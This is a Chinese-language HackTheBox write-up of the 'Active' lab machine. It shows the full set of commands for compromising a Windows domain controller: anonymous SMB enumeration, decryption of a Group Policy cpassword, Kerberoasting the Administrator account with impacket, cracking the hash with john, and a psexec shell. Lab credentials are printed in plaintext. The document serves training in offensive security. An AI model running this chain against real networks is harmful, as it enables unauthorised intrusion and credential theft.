Active on HackTheBox

, , , , , ,

Before all

Victim’s IP : 10.10.10.100
Victim’s Host : *.active.htb
Attacker’s IP : 10.10.14.14

RECON

port scan

Command 

1
rustscan -a 10.10.10.100 --ulimit 5000 -- -sC -sV -Pn

Command 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-22 08:51:28Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5722/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49164/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49174/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49175/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40109/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 39290/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38631/udp): CLEAN (Failed to receive data)
|   Check 4 (port 25854/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-12-22T08:52:35
|_  start_date: 2024-12-22T08:48:16
|_clock-skew: -7h52m31s

一樣是常見的 Domain Controller,只是版本比較老但不能打 qq
smb, ldap, kerberos, winrpc…

Exploit

Anonymous login to SMB

嘗試不使用帳號密碼登入 Samba
Command 

1
smbclient -L //10.10.10.100/ -N

Result 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

可以無帳密登入!
以 crackmapexec 輔助爬取並下載檔案 

1
crackmapexec smb 10.10.10.100 -u '' -p '' -M spider_plus -o READ_ONLY=true

gpp decrypt

發現 Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml 檔案: 

1
2
3
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

將 cpassword 段落取出,以 gpp-decrypt 做密碼破解: 

1
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

取得密碼:GPPstillStandingStrong2k18
再次以 svc_tgs 身分使用一次 crackmapexec 就可以獲得 Users 下的 user.txt

Privilege Escalation

先用 bloodhound 做 RECON 

1
bloodhound-python -c All -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -d active.htb -ns 10.10.10.100 --zip

image
注意到 Administrator 帳號設有 spn,代表它可視為一個服務帳號,利用 GetUserSPNs 可以對它進行請求,又因為 TGS-REP 是用服務的帳號 HASH 進行簽名,就可以獲得它的 TGS 進行本地爆破

先取得 SVC_TGS 的 TGT 

1
2
impacket-getTGT active.htb/'svc_tgs':'GPPstillStandingStrong2k18'
export KRB5CCNAME=svc_tgs.ccache

最後利用剛剛取得的 TGT 對admin進行請求(以 GetUserSPNs 腳本完成) 

1
impacket-GetUserSPNs -dc-ip 10.10.10.100 -request -k -usersfile userlist.txt active.htb/

最後把拿到的 Administrator TGS 丟進去 john 爆破: 

1
john hash --wordlist=/home/kali/rockyou.txt

image
一樣,再次 crackmapexec 即可拿到 root flag

After all

生為一個 Hacker,不 get shell 能開心嗎???
利用 impacket-psexec,搭配 admin 權限就可以寫入 exe 做到 RCE! 

1
impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100

image